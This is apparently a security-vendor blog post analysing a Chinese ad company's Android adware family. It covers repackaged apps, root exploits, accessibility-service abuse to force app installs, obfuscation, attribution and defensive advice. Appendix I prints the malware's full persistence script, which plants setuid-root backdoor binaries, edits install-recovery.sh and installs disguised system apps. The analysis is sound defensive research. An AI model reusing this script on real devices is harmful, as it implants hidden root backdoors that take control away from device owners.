The malicious adware uses novel techniques to maintain persistence and obfuscate its activity, including installing system level services, modifying the recovery script executed on boot, and even tricking the user into enabling automatic app installation. We have observed over 300 malicious, illegitimate versions of Android apps being distributed, including: Amazon, Memory Booster, Clean Master, PopBird, YTD Video Downloader, and Flashlight.
By taking control of mobile devices via its adware, NGE Mobi is able to “guarantee” downloads of the apps it gets paid to promote. They also generate ad revenue by serving ads via full control of a victim’s device.
The core manner used by NGE Mobi is able to take over Android devices is shown in Figure 1.
Figure 1. Infection process
As shown in Figure 2, the infection range is wide, victims with 308 different phone models from more than 26 countries (and four continents) have been infected.
Figure 2. World infection map
The malicious adware has infected 20 different versions of Android, from 2.3.4 to 5.1.1. This covers almost all versions of Android.
FireEye started to monitor this malware family in August and the number of active, infected devices is still increasing.
In the following sections we provide analysis of this malicious adware family.
How the Malicious Adware Works
As shown in Figure 3, the attackers repackage popular apps and inject malicious logic and ad components into the apps. The samples are continuously evolving. More recent samples have even more powerful obfuscation and packing mechanisms. After propagating to the victim’s phone, the malware unpacks and releases the malicious payload along with the normal components of the repackaged app.
Figure 3. An overview of the malicious adware workflow
First, the malicious adware collects and uploads device information to its remote servers. It iterates the following domains and posts data once a connection is established:
The adware encrypts and encodes some of the uploaded data using AES/CBC/NoPadding followed by Base64. None of the uploaded data is critical. It simply includes the device model details, MAC address, IMEI/IMSI, system and software info, and so on.
Next, it downloads an APK and dynamically loads logic to execute
This downloaded APK has the package name “com.dashi.rootmaster.demo” and after being loaded into the original app, it drives the process of rooting the victim’s phone.
After loading this root master, the app extracts a few native executables named “r1”, “r2”, “r3”, “r4”, “r5”, etc, and a shell script called “rsh”. Each “rx” binary corresponds to a root exploit, including but not limited to the following:
- Root exploit targeting Mediatek mt65xx chips
- put_user exploit
After gaining root, the app executes the “rsh” script. The script is listed in the Appendix for reference. It performs the following actions:
- Remount /system as writable
- Implant SU daemon as the root backdoor into /system, and append a line into install-recovery.sh, which executes on boot
- Set the install-recover.sh as immutable to avoid removal
- Install APKs into /system partition to consistently and persistently control the victim phone
Now that the app has full control of the phone, it can use the victim’s phone for any purpose. The app never mounts the /system back to read-only, and allows anyone to invoke its root backdoor to obtain root privilege. Any other attackers landing on the same victim phone can control or make permanent damages to the phone. All communications use HTTP, so anyone can hijack the connection and take over the control of this large botnet.
With root privilege on our device, we observed the adware automatically download and install a browser app named “Cool Browser”.
This browser app serves adult content in its own home screen and promote apps on the victims' phones. It also puts pornographic videos and app ads as shortcuts on the phone’s home screen, as shown in Figure 4. It is well known that porn websites and third-party apps outside Google Play may contain malicious code, so this again opened further attack surface on the victim’s phone.Figure 4. The screenshots of “Cool Browser” on home screen and its installed shortcuts
Regardless of whether the rooting process is successful, this malicious adware family utilizes Android Accessibility Service to check if the current window is the Android installation prompt. If so, it will force click the install button.
Figure 5. The screenshots of the added malicious accessibility entries from two different samples
Figure 5 shows the screenshots of the added accessibility entries from two samples of this malicious adware family. The description of the accessibility is totally misleading and does not mention that it will force click the install button. What’s more, the samples themselves lure victims to enable the accessibility entry, as shown in Figure 6.
Figure 6. The sample prompts victim to enable the malicious accessibility service
If the victim follows the instructions and enables the corresponding accessibility service, the installation flow of any app promoted by the samples are automated as follows:
- If the victim clicks the ad to download an APK and trigger the installation prompt, the malicious accessibility service automatically clicks “install” and “yes” on behalf of the user.
- If the victim clicks the ad but the ad is pointing to a Google Play link, the malicious accessibility service automatically clicks “install” and “accept” when Android prompts the permission list for user to confirm.
Therefore, even if the samples fail to root the phone, they can still automatically install any app without user consent.
In addition to normal Java code and native code obfuscation, the malicious adware obfuscates itself using the following methods to increase the difficulty of detection and reverse engineering:
It uses packers to pack executables. In the most recent samples, all Java and native components are encrypted and extracted at runtime.
Some payloads are named with dot (“.”) prefix to evade manual analysis. Most payloads are named using meaningless, random strings. Some executables are named to disguise as other file types or even system components.
Once executed, most executables and payloads containing exploits will be removed.
The implanted system services have deceiving package names like “com.android.theme.manages” and “com.android.camera.update”, pretending to be one of the OEM Android system services.
We have gathered 338 samples in the wild that fall into this malicious adware family. Table 1 lists the certificates signing most of the samples:
Number of Samples
CN=google, OU=google, O=android, C=CN
CN=ngsteam, OU=ngsteam, O=xinyinhe, C=CN
CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
Table 1. Certificate info and stats among our collected samples
Our analysis revealed the following information:
- There are simplified Chinese characters and Chinese pinyin in the code, so the attacker may be coming from China.
- One of the popular certificate has the CN field as “ngsteam” (“ng” stands for “New Galaxy”, the English translation of “xinyinhe”) and the O field is “xinyinhe”.
- The root exploit payload, Root Master, has someone with email in xinyinhe.com domain participating in the developing.
- xinyinhe.com has a subdomain named root.xinyinhe.com, serving root tools similar to the payload used in the samples.
This evidence points to the Chinese mobile ad promotion company, xinyinhe (with their official website hosted at www[.]xinyinhe[.]com and www[.]ngemobi[.]com. The first website was taken down before we wrote this blog, and the second got taken down while drafting this post).
We obtained this company’s app repackaging tool in Figure 3 and the private key corresponding to the first certificate in Table 1 on a server without authentication protection. This is key evidence that proves that this Chinese company is behind the infections.
The following text was pulled from their website:
“Founded on June 21, 2013, the company has extended its business and built branch offices in Beijing, Shenzhen, Shanghai, and Singapore. In November 2014, we were invested 20 million dollars by Legend Capital with 100 million dollars valuation. Just in one year, the company has received great reputation and investment, which created the miraculous 50 times increase.”
“Optimized operation methods and users guarantee releasing the games easily. Release to users in 50 countries and support payments to 170 countries worldwide.”
“Long term cooperation with more than 120 Content Providers. Perfect product localization team provide the translation, polishing, beautification, optimization etc. which will quickly make your application fit for overseas customers.”
It appears that the company spent lots of effort and resources on marketing and promotion, explaining why the infection is so global. Consequently, the large number of infected phones is also helping the company grow.
Our investigation shows that the samples have been propagated via numerous channels. The major channel is through the giant ad cooperative network that xinyinhe participates in (ad vendors in the network promote services and products for each other). We also witnessed a few posts on popular social networks (Facebook, Twitter, etc.) with adult content containing links to xinyinhe samples.
This is a worldwide, spreading malicious adware family with a high threat, likely controlled by a Chinese organization. We suggest that you:
- Never click on suspicious links from emails/SMS/websites/advertisements.
- Don’t install apps outside the official app store.
- Keep Android devices updated to avoid being rooted by public known bugs. (Note: The malware can not root devices with Android OS 5.0 and above, as of now. However, because the root program is downloaded on runtime, we cannot rule out the possibility that the attackers can enhance the root programs. So, upgrading to the latest version of OS will provide some security but is not a guarantee that you will remain completely safe from this malware.)
To detect and defend against such attacks, we advise our customers to deploy a mobile security solution to gain visibility of threats in their user base, and proactively hunt down devices that have been compromised. In addition, we advise our customers with NX appliances to ensure that WiFi traffic is scanned by NX appliances to extend coverage to mobile devices.
Any affected user may have inadvertently compromised their user credentials for some online services. We recommend those users change their passwords for any online services such as iTunes, online banking, email, and work accounts.
Appendix I. Shell Script Executed by One of the Samples
mount -o remount,rw /system;
mount -o remount rw /system;
echo -e '/system/bin/daemonuis --auto-daemon &' >> /system/etc/install-recovery.sh
chmod 755 /system/etc/install-recovery.sh;
cat /data/data/com.locker.maboo.tow/app_libo/uis > /system/bin/uis;
cat /system/bin/uis > /system/bin/daemonuis;
chmod 6777 /system/bin/daemonuis;
chown 0.0 /system/bin/daemonuis;
chown 0.0 /system/bin/uis;
chmod 6777 /system/bin/uis;
mount -o remount,rw /system;
mount -o remount rw /system;
/data/data/com.locker.maboo.tow/files/.sys.apk -i -a /system/etc/install-recovery.sh;
echo -e '#!/system/bin/sh; /system/xbin/.ext.base &' >> /system/etc/install-recovery.sh;
chmod 755 /system/etc/install-recovery.sh;
/data/data/com.locker.maboo.tow/files/.sys.apk +i +a /system/etc/install-recovery.sh;
cat /data/data/com.locker.maboo.tow/files/.service > /system/xbin/.ext.base;
chown 0.0 /system/xbin/.ext.base;
chmod 6777 /system/xbin/.ext.base;
cat /data/data/com.locker.maboo.tow/files/.client > /system/xbin/.b;
chown 0.0 /system/xbin/.b;
chmod 6777 /system/xbin/.b;
cat /data/data/com.locker.maboo.tow/files/.df > /system/xbin/.df;
chmod 777 /system/xbin/.df;
chmod 777 /data/data/com.locker.maboo.tow/files/.center.tapk;
chown 0.0 /system/app/cameraupdate.apk;
chmod 0644 /system/app/cameraupdate.apk;
cat /data/data/com.locker.maboo.tow/files/.center.tapk > /system/app/cameraupdate.apk;
pm disable com.android.camera.update;
pm enable com.android.camera.update;
chmod 777 /system/xbin/.sys.apk;
/data/data/com.locker.maboo.tow/files/.sys.apk +i +a /system/xbin/.sys.apk;
chmod 777 /data/data/com.locker.maboo.tow/files/.dlme.apk;
chown 0.0 /system/app/ThemeManags.apk;
chmod 0644 /system/app/ThemeManags.apk;
cat /data/data/com.locker.maboo.tow/files/.dlme.apk > /system/app/ThemeManags.apk;
pm disable com.android.theme.manages;
pm enable com.android.theme.manages;
chmod 777 /data/data/com.locker.maboo.tow/files/.dler.apk;
pm install -r /data/data/com.locker.maboo.tow/files/.dler.apk;
Appendix II. Examples of Some Samples
Package Name: com.locker.maboo.tow
Package Name: com.tmdfkslakssspp111.ivityfffds1133
Package Name: com1.xiaoao2.FruitSingle
Package Name: com.mobilefish.pig.enpais
Package Name: com.adad.flashlight
Package Name: com.liuximnb.videokl2
Package Name: com.4puBX.Bu1q0
Package Name: com.sQ1z7.JXhkN
Package Name: com.cg.wifienhancer
Package Name: com.BmiZX.p6l9v